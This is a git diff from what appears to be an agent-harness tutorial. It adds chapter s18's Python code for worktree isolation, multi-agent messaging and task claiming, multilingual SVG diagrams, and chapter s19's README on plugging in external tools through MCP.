Auto-complete bound task.""" + path = WORKTREES_DIR / name + if not path.exists(): + return f"Worktree '{name}' not found" + run_git(["worktree", "remove", str(path), "--force"]) + run_git(["branch", "-D", f"wt/{name}"]) + log_event("remove", name) + for task in list_tasks(): + if task.worktree == name and task.status == "in_progress": + task.status = "completed" + save_task(task) + print(f" \033[32m[worktree] auto-completed: {task.subject}\033[0m") + print(f" \033[33m[worktree] removed: {name}\033[0m") + return f"Worktree '{name}' removed" + + +def keep_worktree(name: str) -> str: + """Keep worktree for manual review. Branch preserved.""" + log_event("keep", name) + print(f" \033[36m[worktree] kept: {name}\033[0m") + return f"Worktree '{name}' kept for review (branch: wt/{name})" + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan, " + "create_worktree, remove_worktree, keep_worktree.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates and create isolated worktrees " + "for each task. 
Teammates auto-claim tasks and work in their " + "assigned worktree directory.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... 
({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the original request via request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = 
"32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (from s17, + worktree path) ── + +IDLE_POLL_INTERVAL = 5 +IDLE_TIMEOUT = 60 + + +def scan_unclaimed_tasks() -> list[dict]: + """Find pending, unowned, unblocked tasks.""" + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + print(f" \033[36m[idle] {name} found inbox messages\033[0m") + return True + + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task_data = unclaimed[0] + claim_task(task_data["id"], agent_name) + wt_info = "" + if task_data.get("worktree"): + wt_path = WORKTREES_DIR / task_data["worktree"] + wt_info = f"\nWork directory: {wt_path}" + messages.append({"role": "user", + "content": f"Task {task_data['id']}: " + f"{task_data['subject']}{wt_info}"}) + print(f" \033[32m[idle] {name} auto-claimed: " + f"{task_data['subject']}\033[0m") + return True + + print(f" \033[31m[idle] {name} timeout ({IDLE_TIMEOUT}s)\033[0m") + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"You can list and claim tasks from the board. 
" + f"If a task has a worktree, work in that directory.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True + + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": "[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + {"name": "list_tasks", + "description": "List all tasks on the board.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": 
"claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + ] + + def _run_list_tasks(): + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + def _run_claim_task(task_id: str): + return claim_task(task_id, owner=name) + + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "submit_plan": lambda plan: _teammate_submit_plan(name, plan), + "list_tasks": _run_list_tasks, + "claim_task": _run_claim_task, + } + + while True: + if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) + + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + if 
should_shutdown: + break + + found_work = idle_poll(name, messages, name, role) + if not found_work: + break + + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role} (autonomous)" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." 
+ + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Lead Worktree Tools (s18 new) ── + +def run_create_worktree(name: str, task_id: str = "") -> str: + return create_worktree(name, task_id) + + +def run_remove_worktree(name: str) -> str: + return remove_worktree(name) + + +def run_keep_worktree(name: str) -> str: + return keep_worktree(name) + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] 
{task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + 
{"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn an autonomous teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, + # s18 new: worktree tools + {"name": "create_worktree", + "description": "Create 
an isolated git worktree with its own branch.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "task_id": {"type": "string"}}, + "required": ["name"]}}, + {"name": "remove_worktree", + "description": "Remove a worktree and auto-complete its bound task.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, + {"name": "keep_worktree", + "description": "Keep a worktree for manual review.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, + "create_worktree": run_create_worktree, + "remove_worktree": run_remove_worktree, + "keep_worktree": run_keep_worktree, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "worktree" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": 
"assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s18: worktree isolation") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms18 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s18_worktree_isolation/images/worktree-overview.en.svg b/s18_worktree_isolation/images/worktree-overview.en.svg new file mode 100644 index 000000000..ae12887a0 --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.en.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + 
Task-Directory Binding + Event Log + + + + s17 Preserved + + s18 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree Isolation (s18 new: each task gets its own directory + branch) + + + + Main repo (.tasks/ + .worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: Refactor auth module + ✓ Isolated, no impact on Bob or main repo + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: Refactor UI login page + ✓ Isolated, no impact on Alice or main repo + + + + Event log: .worktrees/events.jsonl → create / remove / keep + + + Cleanup: keep (preserve branch for review) / remove (delete + mark done) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE lifecycle + + s18: create_worktree + bind_task + remove/keep + events.jsonl (Lead 13→16) + diff --git a/s18_worktree_isolation/images/worktree-overview.ja.svg b/s18_worktree_isolation/images/worktree-overview.ja.svg new file mode 100644 index 000000000..0115d7517 --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.ja.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + タスク・ディレクトリ紐付け + イベントログ + + + + s17 保持 + + s18 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree 隔離(s18 新規:各タスクに独立ディレクトリ + 独立ブランチ) + + + + メインリポジトリ(.tasks/ + .worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: 認証モジュールのリファクタリング + ✓ 隔離、Bob とメインリポジトリに影響なし + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: UI ログインページのリファクタリング + ✓ 隔離、Alice とメインリポジトリに影響なし + + + + イベントログ: 
.worktrees/events.jsonl → create / remove / keep + + + 片付け: keep(ブランチ保持 review)/ remove(削除+完了マーク) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE ライフサイクル + + s18: create_worktree + bind_task + remove/keep + events.jsonl(Lead 13→16) + diff --git a/s18_worktree_isolation/images/worktree-overview.svg b/s18_worktree_isolation/images/worktree-overview.svg new file mode 100644 index 000000000..3d572668a --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + 任务-目录绑定 + 事件日志 + + + + s17 保留 + + s18 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree 隔离(s18 新增:每个任务独立目录 + 独立分支) + + + + 主仓库 (.tasks/ + .worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: 重构认证模块 + ✓ 隔离,不影响 Bob 和主仓库 + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: 重构 UI 登录页 + ✓ 隔离,不影响 Alice 和主仓库 + + + + 事件日志: .worktrees/events.jsonl → create / remove / keep + + + 收尾: keep (保留分支 review) / remove (删除+标记完成) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE lifecycle + + s18: create_worktree + bind_task + remove/keep + events.jsonl (Lead 13→16) + diff --git a/s19_mcp_plugin/README.en.md b/s19_mcp_plugin/README.en.md new file mode 100644 index 000000000..58e5c7591 --- /dev/null +++ b/s19_mcp_plugin/README.en.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — Need More Power? Plug In External Tools + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"Need more power? Plug in MCP"* — Multi-transport, channel routing, tool pool merging. +> +> **Harness layer**: Plugins — External capabilities via a standard protocol. 
+ +--- + +## The Problem + +From s01 through s18, every tool the agent uses was hand-written by you — bash, read, write, task, todo_write. You write the code for each tool's input validation, execution logic, and error handling. + +But now you have 3 external services you want to integrate into the agent: the company's Jira API (query issues, create tickets), an in-house deployment system (trigger deploys, view logs), and the team's Notion knowledge base (search docs, create pages). You don't want to rewrite tool code for every service. + +You need a standard protocol — as long as an external service implements this protocol, the agent can call its tools directly, regardless of what language the service is written in. + +--- + +## The Solution + +![MCP Architecture](images/mcp-architecture.en.svg) + +MCP (Model Context Protocol) defines how agents discover and invoke external tools. Core concepts: + +| Concept | Purpose | +|------|------| +| MCPClient | The agent-side client — connects to servers, discovers tools, invokes tools | +| MCP Server | The external service side — implements `tools/list` + `tools/call` | +| assemble_tool_pool | Merges built-in tools and MCP tools into a single pool | +| mcp\_\_server\_\_tool naming | Prevents tool name collisions across different servers | + +All s18 capabilities preserved (worktree isolation, auto-claiming, idle polling, protocol system). One addition: the `connect_mcp` tool — connect to external services, discover tools, merge into the tool pool. 
+ +--- + +## How It Works + +### MCPClient: Discovery + Invocation + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +The tutorial uses mock handlers to simulate stdio JSON-RPC. The real version would spawn a subprocess, sending `tools/list` and `tools/call` requests via stdin/stdout. + +### connect_mcp: Connect + Discover + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}" +``` + +After connecting, the server's tools are immediately available. + +### assemble_tool_pool: Merge + +```python +def assemble_tool_pool() -> tuple[list[dict], dict]: + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = ( + lambda **kw, c=mcp_client, t=tool_def["name"]: c.call_tool(t, kw)) + return tools, handlers +``` + +The prefix `mcp__{server}__{tool}` prevents tool name collisions across different servers. After calling `connect_mcp`, the agent_loop automatically re-assembles, making new tools immediately available. 
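`connect_mcp` looks the server name up in a `MOCK_SERVERS` registry of factory functions, which this README never shows. A minimal sketch of such a registry, reusing the `MCPClient` shape from above — the `docs` server and its `search` tool are invented for illustration:

```python
class MCPClient:
    """Same shape as the tutorial's MCPClient above."""
    def __init__(self, name: str):
        self.name = name
        self.tools: list[dict] = []
        self._handlers: dict = {}

    def register(self, tool_defs, handlers):
        self.tools = tool_defs
        self._handlers = handlers

    def call_tool(self, tool_name: str, args: dict) -> str:
        handler = self._handlers.get(tool_name)
        if not handler:
            return f"MCP error: unknown tool '{tool_name}'"
        return handler(**args)


def make_docs_server() -> MCPClient:
    """Factory: a client whose handlers fake a docs service."""
    client = MCPClient("docs")
    client.register(
        [{"name": "search",
          "description": "Search the docs knowledge base.",
          "inputSchema": {"type": "object",
                          "properties": {"query": {"type": "string"}},
                          "required": ["query"]}}],
        {"search": lambda query: f"3 hits for '{query}' (mock)"})
    return client


# Each entry maps a server name to a factory, so connecting
# twice yields two independent clients.
MOCK_SERVERS = {"docs": make_docs_server}

client = MOCK_SERVERS["docs"]()                    # what connect_mcp does
print(client.call_tool("search", {"query": "worktree"}))
print(f"mcp__docs__{client.tools[0]['name']}")     # the prefixed name
```

After `assemble_tool_pool` runs, the model sees this tool as `mcp__docs__search`, alongside the built-ins.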
+ +--- + +## Changes from s18 + +| Component | Before (s18) | After (s19) | +|------|-----------|-----------| +| Tool source | All hand-written built-in | Hand-written + MCP external tools with dynamic discovery | +| Tool pool | Fixed BUILTIN_TOOLS | assemble_tool_pool dynamically merges mcp\_\_ prefixed tools | +| New type | — | MCPClient class (simulates tools/list + tools/call) | +| Namespace | — | mcp\_\_server\_\_tool prevents collisions | +| Lead tools | 16 (s18) | 17 (+connect_mcp) | +| Extension method | Write code to add tools | Standard protocol, implement servers in any language | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s19_mcp_plugin/code.py +``` + +Try these prompts: + +1. `Connect to the docs MCP server and search for something` +2. `Connect to the deploy server and trigger a deployment` +3. `Connect both servers — what tools are now available?` + +What to observe: After connecting to an MCP server, do tool names have `mcp__docs__` or `mcp__deploy__` prefixes? Are both servers' tools available simultaneously? + +--- + +## You Made It Here + +This is the final chapter. Looking back at the road you've traveled: + +``` +s01-s04 Tool pipeline loop → dispatch → permission → hooks +s05-s08 Single-agent planning → subagent → skill → compact +s09-s11 Knowledge memory → prompt → error recovery +s12-s14 Persistent work task graph → background → cron +s15-s19 Multi-agent teams → protocols → autonomy → worktree → MCP +``` + +You've built a complete agent harness from scratch. 19 chapters, each adding one mechanism. Every mechanism hooks onto the same while True loop — the loop itself, unchanged. + +
+Deep Dive into CC Source
+
+> The following is based on complete analysis of CC source: `services/mcp/client.ts` (3348 lines), `auth.ts` (2466 lines), `config.ts` (1579 lines), `channelNotification.ts` (317 lines).
+
+### 1. Six Transport Types
+
+The tutorial only shows stdio. CC supports 6 transport types (`types.ts:23-25`):
+
+| Transport | Communication method |
+|-----------|---------|
+| `stdio` | Subprocess stdin/stdout (cross-platform default) |
+| `sse` | HTTP Server-Sent Events |
+| `http` | Streamable HTTP (POST/SSE bidirectional) |
+| `ws` | WebSocket |
+| `sse-ide` | IDE-embedded SSE transport |
+| `sdk` | In-process SDK transport |
+
+On connection, local (stdio) and remote (http/sse/ws) servers are batched concurrently: local batch of 3, remote batch of 20.
+
+### 2. Tool Pool Merging Algorithm
+
+`assembleToolPool()` (`tools.ts:345-367`):
+
+```typescript
+// Dedup with priority: built-in tools win on name collision (sorted first)
+return uniqBy(
+  [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)],
+  'name',
+)
+```
+
+**Key detail**: Built-in and MCP tools are sorted separately, not together. The reason is CC's `claude_code_system_cache_policy` places a global cache breakpoint after the last built-in tool at a specific position — mixing the sort would break this design.
+
+### 3. Naming Convention: `mcp__server__tool`
+
+`buildMcpToolName()` (`mcpStringUtils.ts:50-52`):
+
+```
+mcp__<server>__<tool>
+```
+
+All non-`[a-zA-Z0-9_-]` characters are replaced with `_`. For example, `slack` server's `post_message` → `mcp__slack__post_message`.
+
+### 4. Channel Notifications: Servers Push Messages Back
+
+The tutorial only covers agent → MCP Server unidirectional calls. CC also supports **reverse notifications** (`channelNotification.ts`):
+
+1. Server declares `capabilities.experimental['claude/channel']`
+2. Server sends messages to agent via MCP notification `notifications/claude/channel`
+3. Messages are wrapped in `...` XML tags
+4. 
Agent is woken up by SleepTool (within 1 second)
+
